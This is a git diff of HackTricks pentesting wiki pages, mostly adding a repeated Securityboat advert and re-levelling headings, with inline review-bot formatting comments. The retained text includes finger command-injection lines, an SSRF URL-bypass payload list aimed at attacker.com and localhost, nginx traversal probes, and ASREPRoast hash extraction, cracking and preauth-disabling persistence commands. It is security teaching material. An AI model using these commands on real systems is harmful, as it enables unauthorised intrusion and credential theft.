it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/554-8554-pentesting-rtsp.md b/network-services-pentesting/554-8554-pentesting-rtsp.md index 432335bf..8d0170db 100644 --- a/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Basic Information > The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). @@ -98,8 +105,14 @@ Cameradar allows you to: * Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content * Try to create a Gstreamer pipeline to check if they are properly encoded * Print a summary of all the informations Cameradar could get +* [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) -[https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
diff --git a/network-services-pentesting/873-pentesting-rsync.md b/network-services-pentesting/873-pentesting-rsync.md index 3307ed0a..a52297b2 100644 --- a/network-services-pentesting/873-pentesting-rsync.md +++ b/network-services-pentesting/873-pentesting-rsync.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## **Basic Information** > **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. 
@@ -111,6 +118,13 @@ find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) Inside the config file sometimes you could find the parameter _secrets file = /path/to/file_ and this file could contains usernames and passwords allowed to authenticate to rsyncd. +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-finger.md b/network-services-pentesting/pentesting-finger.md index 587f13f0..4bb89886 100644 --- a/network-services-pentesting/pentesting-finger.md +++ b/network-services-pentesting/pentesting-finger.md @@ -1,4 +1,4 @@ - +# 79 - Pentesting Finger
@@ -16,28 +16,34 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# **Basic Info** +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files. +## **Basic Info** + +**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number (if known), login time, idle time, time mail was last read, and the user's plan and project files. **Default port:** 79 -```text +``` PORT STATE SERVICE 79/tcp open finger ``` -# **Enumeration** +## **Enumeration** -## **Banner Grabbing/Basic connection** +### **Banner Grabbing/Basic connection** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` -## **User enumeration** +### **User enumeration** ```bash finger @ #List users 
@@ -53,35 +59,40 @@ finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` -### **Nmap execute a script for doing using default scripts** +#### **Nmap execute a script for doing using default scripts** -## Metasploit uses more tricks than Nmap +### Metasploit uses more tricks than Nmap -```text +``` use auxiliary/scanner/finger/finger_users ``` -## Shodan +### Shodan * `port:79 USER` -# Command execution +## Command execution ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` -# Finger Bounce +## Finger Bounce [Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) -```text +``` finger user@host@victim finger @internal@external ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -98,5 +109,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md index 620e8766..379a7924 100644 --- a/network-services-pentesting/pentesting-rpcbind.md +++ b/network-services-pentesting/pentesting-rpcbind.md @@ -1,4 +1,4 @@ - +# 111/TCP/UDP - Pentesting Portmapper
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Basic Information +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Basic Information Provides information between Unix based systems. Port is often probed, it can be used to fingerprint the Nix OS, and to obtain information about available services. Port used with NFS, NIS, or any rpc-based service. @@ -28,7 +34,7 @@ PORT STATE SERVICE 111/tcp open rpcbind ``` -# Enumeration +## Enumeration ``` rpcinfo irked.htb @@ -39,11 +45,11 @@ Sometimes it doesn't give you any information, in other occasions you will get s ![](<../.gitbook/assets/image (230).png>) -## Shodan +### Shodan * `port:111 portmap` -# RPCBind + NFS +## RPCBind + NFS If you find the service NFS then probably you will be able to list and download(and maybe upload) files: @@ -51,7 +57,7 @@ If you find the service NFS then probably you will be able to list and download( Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol. -# NIS +## NIS If you find the service `ypbind`running: @@ -81,7 +87,7 @@ yumi:ZEadZ3ZaW4v9.:1377:160::/export/home/yumi:/bin/bash | /etc/group | group.byname, group.bygid | NIS group file | | /usr/lib/aliases | mail.aliases | Details mail aliases | -# RPC Users +## RPC Users If you find the **rusersd** service listed like this: 
@@ -89,17 +95,17 @@ If you find the **rusersd** service listed like this: You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md). -# Bypass Filtered Portmapper port +## Bypass Filtered Portmapper port If during a nmap scan you see open ports like NFS but the port 111 is filtered, you won't be able to exploit those ports.\ But, if you can simulate a locally a portmapper service and you tunnel the NFS port from your machine to the victim one, you will be able to use regular tools to exploit those services.\ More information in [https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc) -# Shodan +## Shodan * `Portmap` -# HackTricks Automatic Commands +## HackTricks Automatic Commands ``` Protocol_Name: Portmapper #Protocol Abbreviation if there is one. @@ -125,6 +131,12 @@ Entry_3: Command: nmap -sSUC -p 111 {IP} ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
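Review bot: After this hunk the page carries two Shodan sections, `### Shodan` under Enumeration (`port:111 portmap`) and this `## Shodan` (`Portmap`). Merge both queries under one heading rather than re-levelling each. The context line at the top of the hunk also labels its link "1026 - Pentesting Rsusersd" while the service is named rusersd, which is worth correcting in the same pass.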
@@ -141,5 +153,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/network-services-pentesting/pentesting-vnc.md b/network-services-pentesting/pentesting-vnc.md index ae8467ba..539b8d9a 100644 --- a/network-services-pentesting/pentesting-vnc.md +++ b/network-services-pentesting/pentesting-vnc.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Basic Information In computing, **Virtual Network Computing** (**VNC**) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical-screen updates back in the other direction, over a network.\ @@ -64,6 +71,13 @@ I save the tool here also for ease of access: * `port:5900 RFB` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md index 921a9c48..2e31019e 100644 --- a/network-services-pentesting/pentesting-web/nginx.md +++ b/network-services-pentesting/pentesting-web/nginx.md @@ -1,4 +1,4 @@ - +# Nginx
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Missing root location +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Missing root location ``` server { @@ -30,11 +36,11 @@ server { } ``` -The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. +The root directive specifies the root folder for Nginx. In the above example, the root folder is `/etc/nginx` which means that we can reach files within that folder. The above configuration does not have a location for `/ (location / {...})`, only for `/hello.txt`. Because of this, the `root` directive will be globally set, meaning that requests to `/` will take you to the local path `/etc/nginx`. A request as simple as `GET /nginx.conf` would reveal the contents of the Nginx configuration file stored in `/etc/nginx/nginx.conf`. If the root is set to `/etc`, a `GET` request to `/nginx/nginx.conf` would reveal the configuration file. In some cases it is possible to reach other configuration files, access-logs and even encrypted credentials for HTTP basic authentication. -# Alias LFI Misconfiguration +## Alias LFI Misconfiguration Inside the Nginx configuration look the "location" statements, if someone looks like: @@ -78,7 +84,7 @@ alias../../../../../../../../../../../ => HTTP status code 400 alias../ => HTTP status code 403 ``` -# Unsafe variable use +## Unsafe variable use An example of a vulnerable Nginx configuration is: 
@@ -100,13 +106,13 @@ Location: https://example.com/ Detectify: clrf ``` -Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). +Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/). -## Any variable +### Any variable In some cases, user-supplied data can be treated as an Nginx variable. It’s unclear why this may be happening, but it’s not that uncommon or easy to test for as seen in this [H1 report](https://hackerone.com/reports/370094). If we search for the error message, we can see that it is found in the [SSI filter module](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx\_http\_ssi\_filter\_module.c#L365), thus revealing that this is due to SSI. -One way to test for this is to set a referer header value: +One way to test for this is to set a referer header value: ``` $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’ 
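Review bot: The curl example kept as context at the end of this hunk still uses typographic quotes (`‘Referer: bar’`, `‘foobar’`), which a shell does not treat as quoting, and the unquoted URL lets the shell expand `$http_referer` itself. The two `+` prose lines here appear to differ from the lines they replace only in whitespace, so this is a good place to switch the command to plain single quotes and quote the URL so the check can be copied as written.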
@@ -114,9 +120,9 @@ $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar We scanned for this misconfiguration and found several instances where a user could print the value of Nginx variables. The number of found vulnerable instances has declined which could indicate that this was patched. -# Raw backend response reading +## Raw backend response reading -With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? +With Nginx’s `proxy_pass`, there’s the possibility to intercept errors and HTTP headers created by the backend. This is very useful if you want to hide internal error messages and headers so they are instead handled by Nginx. Nginx will automatically serve a custom error page if the backend answers with one. But what if Nginx does not understand that it’s an HTTP response? If a client sends an invalid HTTP request to Nginx, that request will be forwarded as-is to the backend, and the backend will answer with its raw content. Then, Nginx won’t understand the invalid HTTP response and just forward it to the client. Imagine a uWSGI application like this: @@ -127,7 +133,7 @@ def application(environ, start_response): return [b"Secret info, should not be visible!"] ``` -And with the following directives in Nginx: +And with the following directives in Nginx: ``` http { 
@@ -139,7 +145,7 @@ http { [proxy\_intercept\_errors](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_intercept\_errors) will serve a custom response if the backend has a response status greater than 300. In our uWSGI application above, we will send a `500 Error` which would be intercepted by Nginx. -[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. +[proxy\_hide\_header](http://nginx.org/en/docs/http/ngx\_http\_proxy\_module.html#proxy\_hide\_header) is pretty much self explanatory; it will hide any specified HTTP header from the client. If we send a normal `GET` request, Nginx will return: @@ -169,13 +175,13 @@ Secret-Header: secret-info Secret info, should not be visible! ``` -# merge\_slashes set to off +## merge\_slashes set to off The [merge\_slashes](http://nginx.org/en/docs/http/ngx\_http\_core\_module.html#merge\_slashes) directive is set to “on” by default which is a mechanism to compress two or more forward slashes into one, so `///` would become `/`. If Nginx is used as a reverse-proxy and the application that’s being proxied is vulnerable to local file inclusion, using extra slashes in the request could leave room for exploit it. This is described in detail by [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d). -We found 33 Nginx configuration files with `merge_slashes` set to “off”. +We found 33 Nginx configuration files with `merge_slashes` set to “off”. -# default is not specified for map directive +## default is not specified for map directive It looks like common case when **`map` is used for some kind of authorization control**. Simplified example could look like: 
@@ -208,11 +214,9 @@ server { > sets the resulting value if the source value matches none of the specified variants. When default is not specified, the default\ > resulting value will be an empty string. -It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`. - -# DNS Spoofing Nginx - +It is easy to forget about `default` value. So **malefactor can bypass this "authorization control"** simply accessing a **non existent case inside `/map-poc`** like `https://targethost.com/map-poc/another-private-area`. +## DNS Spoofing Nginx According to this post: [http://blog.zorinaq.com/nginx-resol**ver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) **It might be possible to spoof DNS records** to Nginx if you **know the DNS server Nginx** is using (and you can intercept somehow the communication, so this is **not valid if 127.0.0.1** is used) and the **domain it's asking**. 
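Review bot: The link label on the context line under the new `## DNS Spoofing Nginx` heading is split by bold markers (`nginx-resol**ver-vulns/**`), so it renders with stray emphasis even though the target URL is intact. Fix the label while re-levelling this heading; the `+It is easy to forget` line otherwise seems to change only whitespace.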
@@ -222,31 +226,37 @@ Nginx can specify a DNS server to use with: resolver 8.8.8.8; ``` -# `proxy_pass` and `internal` directives +## `proxy_pass` and `internal` directives The **`proxy_pass`** directive can be used to **redirect internally requests to other servers** internal or external.\ The **`internal`** directive is used to make it clear to Nginx that the **location can only be accessed internally**. The use of these directives **isn't a vulnerability but you should check how are them configured**. -# Try it yourself +## Try it yourself Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself! [https://github.com/detectify/vulnerable-nginx](https://github.com/detectify/vulnerable-nginx) -# Static Analyzer tools +## Static Analyzer tools -## [GIXY](https://github.com/yandex/gixy) +### [GIXY](https://github.com/yandex/gixy) Gixy is a tool to analyze Nginx configuration. The main goal of Gixy is to prevent security misconfiguration and automate flaw detection. -# References +## References -* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/)**** -* ****[**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/)**** -* ****[**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115)**** +* [**https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/**](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) +* [**http://blog.zorinaq.com/nginx-resolver-vulns/**](http://blog.zorinaq.com/nginx-resolver-vulns/) +* [**https://github.com/yandex/gixy/issues/115**](https://github.com/yandex/gixy/issues/115) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. 
It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -263,5 +273,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index 177131c4..de3dbbc1 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -1,4 +1,4 @@ - +# URL Format Bypass
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -## Localhost +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +### Localhost ```bash # Localhost @@ -85,7 +91,7 @@ spoofed.burpcollaborator.net = 127.0.0.1 ![](<../../.gitbook/assets/image (649) (1) (1).png>) -## Domain Parser +### Domain Parser ```bash https:attacker.com @@ -115,7 +121,7 @@ attacker。com ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` -## Domain Confusion +### Domain Confusion ```bash # Try also to change attacker.com for 127.0.0.1 to try to access localhost @@ -160,7 +166,7 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ next={domain}&next=attacker.com ``` -## Paths and Extensions Bypass +### Paths and Extensions Bypass If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses: @@ -170,7 +176,7 @@ https://metadata/vulerable/path#.extension https://metadata/expected/path/..%2f..%2f/vulnerable/path ``` -## Bypass via redirect +### Bypass via redirect It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\ For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\ 
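Review bot: Demoting `## Localhost`, `## Domain Parser`, `## Domain Confusion`, `## Paths and Extensions Bypass` and `## Bypass via redirect` to `###` leaves them directly under the new `# URL Format Bypass` title with no `##` parent, while the later `Explained Tricks` section becomes `##`. Either keep these five at `##` or add a `##` heading above them so the outline does not skip a level.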
@@ -197,9 +203,9 @@ class Redirect(BaseHTTPRequestHandler): HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever() ``` -# Explained Tricks +## Explained Tricks -## Blackslash-trick +### Blackslash-trick In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard. @@ -207,12 +213,18 @@ Both of them describe a way of parsing URI/URLs, with one slight difference. The ![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg) -## Other Confusions +### Other Confusions ![](<../../.gitbook/assets/image (629).png>) image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
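Review bot: The heading rewritten in this hunk still reads `### Blackslash-trick`, while the paragraph directly below it calls the technique the _backslash-trick_. Correct the spelling to `### Backslash-trick` in the same change, since the line is already being modified.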
@@ -229,5 +241,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md index c061d11e..cfb94abd 100644 --- a/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md +++ b/pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md @@ -16,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. ## Finding exposed pods with OSINT @@ -223,6 +230,13 @@ For example, a remote attacker can abuse this by accessing the following URL: `h {% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/reversing/reversing-tools-basic-methods/README.md b/reversing/reversing-tools-basic-methods/README.md index 754c657f..6f946dcd 100644 --- a/reversing/reversing-tools-basic-methods/README.md +++ b/reversing/reversing-tools-basic-methods/README.md @@ -1,7 +1,5 @@ # Reversing Tools & Basic Methods -## Reversing Tools & Basic Methods -
Support HackTricks and get benefits! @@ -18,6 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + ## Wasm decompiler / Wat compiler Online: @@ -398,6 +403,13 @@ So, in this challenge, knowing the values of the buttons, you needed to **press * [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering) * [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} +
Support HackTricks and get benefits! diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index 445bc090..aefee360 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -1,4 +1,4 @@ - +# ASREPRoast
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# ASREPRoast +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## ASREPRoast The ASREPRoast attack looks for **users without Kerberos pre-authentication required attribute (**[_**DONT\_REQ\_PREAUTH**_](https://support.microsoft.com/en-us/help/305144/how-to-use-the-useraccountcontrol-flags-to-manipulate-user-account-pro)_**)**_. @@ -25,13 +31,13 @@ That means that anyone can send an AS\_REQ request to the DC on behalf of any of Furthermore, **no domain account is needed to perform this attack**, only connection to the DC. However, **with a domain account**, a LDAP query can be used to **retrieve users without Kerberos pre-authentication** in the domain. **Otherwise usernames have to be guessed**. -### Enumerating vulnerable users (need domain credentials) +#### Enumerating vulnerable users (need domain credentials) ```bash Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView ``` -### Request AS\_REP message +#### Request AS\_REP message {% code title="Using Linux" %} ```bash @@ -49,14 +55,14 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github ``` {% endcode %} -## Cracking +### Cracking ``` john --wordlist=passwords_kerb.txt hashes.asreproast hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt ``` -## Persistence +### Persistence Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties): 
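Review bot: With `# ASREPRoast` added as the file title, the `## ASREPRoast` heading in the first hunk here repeats the title one level down, and the following hunks move `Enumerating vulnerable users` and `Request AS\_REP message` to `####` with no `###` above them, while `Cracking` and `Persistence` sit at `###`. Drop or rename the duplicate `## ASREPRoast` and use `###` for the two subsections so the outline is consistent.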
@@ -66,6 +72,12 @@ Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbos [**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -82,5 +94,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/windows-hardening/active-directory-methodology/kerberos-authentication.md b/windows-hardening/active-directory-methodology/kerberos-authentication.md index 2e24f5cc..3bd03fd0 100644 --- a/windows-hardening/active-directory-methodology/kerberos-authentication.md +++ b/windows-hardening/active-directory-methodology/kerberos-authentication.md @@ -1,4 +1,4 @@ - +# Kerberos Authentication
@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
